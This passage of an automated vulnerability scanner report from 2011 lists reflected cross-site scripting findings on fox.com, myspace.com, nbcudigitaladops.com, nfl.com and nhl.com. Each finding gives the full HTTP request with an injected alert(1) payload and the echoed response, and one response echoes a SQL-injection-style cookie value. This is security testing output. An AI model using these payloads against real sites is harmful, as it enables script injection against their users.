<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:js59c29%22-window.location.assign(%22httpdf3ec"-alert(1)-"0fcc499bca2"
s_analytics.hier1="fox:shows:_ui:js59c29%22-window.location.assign(%22httpdf3ec"-alert(1)-"0fcc499bca2" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:js59c29%22-window.l
...[SNIP]...

2.237. http://www.fox.com/_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cda49"-alert(1)-"7795fd16c1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui82a36%22-alert(1)-%228535eeb0e17cda49"-alert(1)-"7795fd16c1d/fox_player/swf/flvPlayer.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B; volumeCookie=75

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.103
Content-Type: text/html; charset=utf-8
Content-Length: 22381
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:09:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui82a36%22-alert(1)-%228535eeb0e17cda49"-alert(1)-"7795fd16c1d:fox_playerflvplayer"
s_analytics.hier1="fox:shows:_ui82a36%22-alert(1)-%228535eeb0e17cda49"-alert(1)-"7795fd16c1d:fox_playerflvplayer" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox
...[SNIP]...

2.238. http://www.fox.com/_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faffe"-alert(1)-"cfa0ec82037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui82a36%22-alert(1)-%228535eeb0e17/fox_playerfaffe"-alert(1)-"cfa0ec82037/swf/flvPlayer.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B; volumeCookie=75

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 22353
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:09:38 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui82a36%22-alert(1)-%228535eeb0e17:fox_playerfaffe"-alert(1)-"cfa0ec82037flvplayer"
s_analytics.hier1="fox:shows:_ui82a36%22-alert(1)-%228535eeb0e17:fox_playerfaffe"-alert(1)-"cfa0ec82037flvplayer" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui8
...[SNIP]...

2.239. http://www.fox.com/_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a2c"-alert(1)-"7fdab8ea2b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf18a2c"-alert(1)-"7fdab8ea2b0/flvPlayer.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B; volumeCookie=75

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.114
Content-Type: text/html; charset=utf-8
Content-Length: 22241
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:09:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
//Site Sub - Section
s_analytics.prop8="fox:shows:_ui82a36%22-alert(1)-%228535eeb0e17:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui82a36%22-alert(1)-%228535eeb0e17:fox_playerswf18a2c"-alert(1)-"7fdab8ea2b0"
s_analytics.prop15="sub section:flvplayer" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.get
...[SNIP]...

2.240. http://www.myspace.com/search/people [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /search/people

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfacc"><script>alert(1)</script>3db7b7228e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/people?q=xss&dfacc"><script>alert(1)</script>3db7b7228e=1 HTTP/1.1
Host: www.myspace.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.myspace.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MSCulture=IP=50.23.123.106&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634531674005723507&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; SessionDDF2=otKv5c6PTjbEe2Zq7NRUtn4t0/v9HqkbDSbsSXsgGnSy2Bd15yWGwXjAMc+zfLhaBlDOQqJEW0VZkUZNDuqFQQ==; MSCOUNTRY=US; __utma=102911388.1624868315.1317595799.1317595799.1317595799.1; __utmb=102911388.1.10.1317595799; __utmc=102911388; __utmz=102911388.1317595799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Server: c8c806b0704a3b1f2d15447da3fbbbe3b0b53e1e91043756
X-AspNet-Version: 4.0.30319
Set-Cookie: MSCOUNTRY=US'%20and%202%3d2--%20; domain=.myspace.com; expires=Sun, 09-Oct-2011 22:54:57 GMT; path=/
X-PoweredBy: Elmo's blood
Date: Sun, 02 Oct 2011 22:54:56 GMT
Content-Length: 67239
X-Vertical: searchrecommendations

<!DOCTYPE html>
<html class="noJS en-US">
<!-- PeopleSiteSearch -->
<head>
<script type="text/javascript">
   (function (wl, his) {var m = wl.href.match(/([?&]_escaped_fragment_=|#!(?=\/))([^&#]*)/
...[SNIP]...
<a href="/search/people?q=xss&dfacc"><script>alert(1)</script>3db7b7228e=1&slpf=Splash&page=1" class="selected">
...[SNIP]...

2.241. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nbcudigitaladops.com
Path:   /hosted/util/getRemoteDomainCookies.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2e0a6<script>alert(1)</script>985c8e5e0e4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallback2e0a6<script>alert(1)</script>985c8e5e0e4 HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 146
Content-Type: application/javascript
ETag: "15f491-44-4aacd3f4ef780"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Sun, 02 Oct 2011 23:03:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:03:12 GMT
Connection: close

__nbcadops_xasis.getRemoteDomainCookiesCallback2e0a6<script>alert(1)</script>985c8e5e0e4("pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000");

2.242. http://www.nfl.com/polls/vote [skin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nfl.com
Path:   /polls/vote

Issue detail

The value of the skin request parameter is copied into the HTML document as plain text between tags. The payload 96d92<x%20style%3dx%3aexpression(alert(1))>72b3095c178 was submitted in the skin parameter. This input was echoed as 96d92<x style=x:expression(alert(1))>72b3095c178 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /polls/vote?random=3753&loc=Homepage&width=&castVoteFlag=&viewName=poll/display-poll-large&skin=large96d92<x%20style%3dx%3aexpression(alert(1))>72b3095c178 HTTP/1.1
Host: www.nfl.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nfl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1317595812555%7C1320187812555%3B%20s_lastvisit%3D1317595812557%7C1412203812557%3B%20s_pv%3Dnfl%253Ahome%253Alanding%7C1317597612559%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|27447553851633AB-400001A160507934[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 4000
Cache-Control: max-age=278
Expires: Sun, 02 Oct 2011 22:56:01 GMT
Date: Sun, 02 Oct 2011 22:51:23 GMT
Connection: close
Vary: Accept-Encoding
X-Akamai-Edgescape: country_code=US


       <!--

<p>param.skin = large96d92<x style=x:expression(alert(1))>72b3095c178</p>
<p>skinNameValue = generic</p>
<p>clickThru = </p>
<p>trackingPixel = </p>
<p>skinName = generic</p>

...[SNIP]...

2.243. http://www.nhl.com/geo/cm/68/HomePage/1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nhl.com
Path:   /geo/cm/68/HomePage/1

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload db02a(a)c1b3025bd21 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /geo/cm/68/HomePagedb02a(a)c1b3025bd21/1 HTTP/1.1
Host: www.nhl.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.nhl.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nhl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Jetty(7.0.0.v20091005)
Date: Sun, 02 Oct 2011 22:51:27 GMT
Content-Length: 69
Connection: close

<!-- no content module for HomePagedb02a(a)c1b3025bd21 location 1 -->

2.244. http://www.nhl.com/geo/cm/68/MediumRail/6 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nhl.com
Path:   /geo/cm/68/MediumRail/6

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1ed53(a)70df5e1988a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /geo/cm/68/MediumRail1ed53(a)70df5e1988a/6 HTTP/1.1
Host: www.nhl.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.nhl.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nhl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Jetty(7.0.0.v20091005)
Date: Sun, 02 Oct 2011 22:51:31 GMT
Content-Length: 71
Connection: close

<!-- no content module for MediumRail1ed53(a)70df5e1988a location 6 -->

2.245. http://www.nhl.com/geo/cm/68/MediumRail/7 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nhl.com
Path:   /geo/cm/68/MediumRail/7

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 62de1(a)a00d971dc5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /geo/cm/68/MediumRail62de1(a)a00d971dc5d/7 HTTP/1.1
Host: www.nhl.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.nhl.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nhl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Jetty(7.0.0.v20091005)
Date: Sun, 02 Oct 2011 22:51:34 GMT
Content-Length: 71
Connection: close

<!-- no content module for MediumRail62de1(a)a00d971dc5d location 7 -->

2.246. http://www.nhl.com/geo/cm/68/Microsite-NHLNetwork/1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nhl.com
Path:   /geo/cm/68/Microsite-NHLNetwork/1

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f2b70(a)d5aa542911d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /geo/cm/68/Microsite-NHLNetworkf2b70(a)d5aa542911d/1 HTTP/1.1
Host: www.nhl.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.nhl.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nhl.com/ice/eventhome.htm?location=/nhlnetwork
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=40367613.838394407.1317595837.1317595837.1317595837.1; __utmc=40367613; __utmz=40367613.1317595837.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csref=http%3A%2F%2Fwww.nhl.com%2F; __cst=b929037341ef9f36; __csv=2a31db5320bf2a6b|0; __csnv=25f0270018dce2cd; s_sq=nhlnhlleaguecom%2Cnhlglobal%3D%2526pid%253Dnhl%25253Aen%25253Aschedule%25253Aweekly%2526pidt%253D1%2526oid%253Dhttp%25253A//ad.doubleclick.net/click%25253Bh%25253Dv8/3b94/0/0/%2525252a/c%25253B246939268%25253B0-0%25253B1%25253B6472457%25253B4307-300/250%25253B44283313/44%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Jetty(7.0.0.v20091005)
Date: Sun, 02 Oct 2011 23:37:22 GMT
Content-Length: 81
Connection: close

<!-- no content module for Microsite-NHLNetworkf2b70(a)d5aa542911d location 1 -->

2.247. http://www.nhl.com/geo/cm/68/Microsite-NHLNetwork/13 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nhl.com
Path:   /geo/cm/68/Microsite-NHLNetwork/13

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 596b2(a)64259b478de was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /geo/cm/68/Microsite-NHLNetwork596b2(a)64259b478de/13 HTTP/1.1
Host: www.nhl.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.nhl.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nhl.com/ice/eventhome.htm?location=/nhlnetwork
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=40367613.838394407.1317595837.1317595837.1317595837.1; __utmc=40367613; __utmz=40367613.1317595837.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csref=http%3A%2F%2Fwww.nhl.com%2F; __cst=b929037341ef9f36; __csv=2a31db5320bf2a6b|0; __csnv=25f0270018dce2cd; s_sq=nhlnhlleaguecom%2Cnhlglobal%3D%2526pid%253Dnhl%25253Aen%25253Aschedule%25253Aweekly%2526pidt%253D1%2526oid%253Dhttp%25253A//ad.doubleclick.net/click%25253Bh%25253Dv8/3b94/0/0/%2525252a/c%25253B246939268%25253B0-0%25253B1%25253B6472457%25253B4307-300/250%25253B44283313/44%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Jetty(7.0.0.v20091005)
Date: Sun, 02 Oct 2011 23:37:22 GMT
Content-Length: 82
Connection: close

<!-- no content module for Microsite-NHLNetwork596b2(a)64259b478de location 13 -->

2.248. http://www.nhl.com/geo/cm/68/Microsite-NHLNetwork/22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nhl.com
Path:   /geo/cm/68/Microsite-NHLNetwork/22

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 17e4a(a)9c3055125a6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /geo/cm/68/Microsite-NHLNetwork17e4a(a)9c3055125a6/22 HTTP/1.1
Host: www.nhl.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.nhl.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nhl.com/ice/eventhome.htm?location=/nhlnetwork
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=40367613.838394407.1317595837.1317595837.1317595837.1; __utmc=40367613; __utmz=40367613.1317595837.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csref=http%3A%2F%2Fwww.nhl.com%2F; __cst=b929037341ef9f36; __csv=2a31db5320bf2a6b|0; __csnv=25f0270018dce2cd; s_sq=nhlnhlleaguecom%2Cnhlglobal%3D%2526pid%253Dnhl%25253Aen%25253Aschedule%25253Aweekly%2526pidt%253D1%2526oid%253Dhttp%25253A//ad.doubleclick.net/click%25253Bh%25253Dv8/3b94/0/0/%2525252a/c%25253B246939268%25253B0-0%25253B1%25253B6472457%25253B4307-300/250%25253B44283313/44%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Jetty(7.0.0.v20091005)
Date: Sun, 02 Oct 2011 23:37:37 GMT
Content-Length: 82
Connection: close

<!-- no content module for Microsite-NHLNetwork17e4a(a)9c3055125a6 location 22 -->

2.249. http://www.nhl.com/geo/cm/68/PageWrapper/7 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nhl.com
Path:   /geo/cm/68/PageWrapper/7

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 251a5(a)027fb17edd7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /geo/cm/68/PageWrapper251a5(a)027fb17edd7/7 HTTP/1.1
Host: www.nhl.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.nhl.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nhl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Jetty(7.0.0.v20091005)
Date: Sun, 02 Oct 2011 22:51:32 GMT
Content-Length: 72
Connection: close

<!-- no content module for PageWrapper251a5(a)027fb17edd7 location 7 -->

2.250. http://www.nhl.com/geo/cm/68/Schedule/1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nhl.com
Path:   /geo/cm/68/Schedule/1

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c0bcd(a)8afefe14983 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

